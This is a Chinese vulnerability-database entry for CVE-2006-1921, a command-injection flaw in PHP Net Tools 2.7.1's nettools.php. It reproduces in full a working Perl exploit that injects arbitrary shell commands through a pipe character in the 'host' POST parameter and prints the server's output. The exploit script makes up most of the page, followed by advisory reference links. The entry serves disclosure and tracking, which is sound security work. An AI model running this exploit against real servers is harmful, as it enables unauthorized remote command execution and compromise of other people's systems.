PHP Net Tools Nettools.PHP 任意shell命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110087 漏洞类型 输入验证
发布时间 2006-04-18 更新时间 2006-04-24
CVE编号 CVE-2006-1921 CNNVD-ID CNNVD-200604-341
漏洞平台 PHP CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/1695
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-341
|漏洞详情
PHPNetTools2.7.1中的nettools.php允许远程攻击者借助于host参数中的shell元字符执行任意命令。
|漏洞EXP
#!/usr/bin/perl
# PHP Net Tools Remote Code Execution Exploit
#
# by FOX_MULDER (fox_mulder@abv.bg)
# Vulnerability found by FOX_MULDER.
#
# "Born to be root !!!"
#----------------------------------+
#PHP Net Tools                     |
#Copyright (C) 2005 Eric Robertson |
#h4rdc0d3@gmail.com                |
#----------------------------------+
#
# Fact:Wbyte counted twice to infinity !!!
#
#
###################################################
	use LWP 5.64;

	my $hostname = $ARGV[0];
	my $dir = $ARGV[1];
	my $command = $ARGV[2];

        if (@ARGV<2) {
	print "\nUsage: ntools.pl www.site.com /dir/ \"ls \-la\" \n";
	exit();
	}
	
	print "=======================================================\n";
	print "0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\n";
	print "PHP Net Tools Command Execution Exploit by FOX_MULDER\n";
	print "fox_mulder@abv.bg\r\n";
	print "=======================================================\n";

	my $browser = LWP::UserAgent->new;
	$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
	print "\n\n[+]Sending request to server . . .\r\n";
	
	my $url = "http://$hostname$dir/nettools.php";

	
	my $response = $browser->post( $url,[
		'ping' => '1',
        	'host' => "|$command"]);

 	my $code = $response->status_line;
        print "[+] HTTP RESPONSE $code\n";
        print "\n[+]Injecting command . . .\n";
	$response->content =~ /blockquote>(.*)<\/blockquote>/s;
	print "$1\n";

# milw0rm.com [2006-04-18]
|参考资料

来源:VUPEN
名称:ADV-2006-1420
链接:http://www.frsirt.com/english/advisories/2006/1420
来源:SECUNIA
名称:19694
链接:http://secunia.com/advisories/19694
来源:MILW0RM
名称:1695
链接:http://milw0rm.com/exploits/1695
来源:XF
名称:phpnettools-nettools-command-execution(25941)
链接:http://xforce.iss.net/xforce/xfdb/25941
来源:BID
名称:17601
链接:http://www.securityfocus.com/bid/17601
来源:VIM
名称:20060609[VIM]UpdateRegardingCVE-2006-1921(fwd)
链接:http://www.attrition.org/pipermail/vim/2006-June/000839.html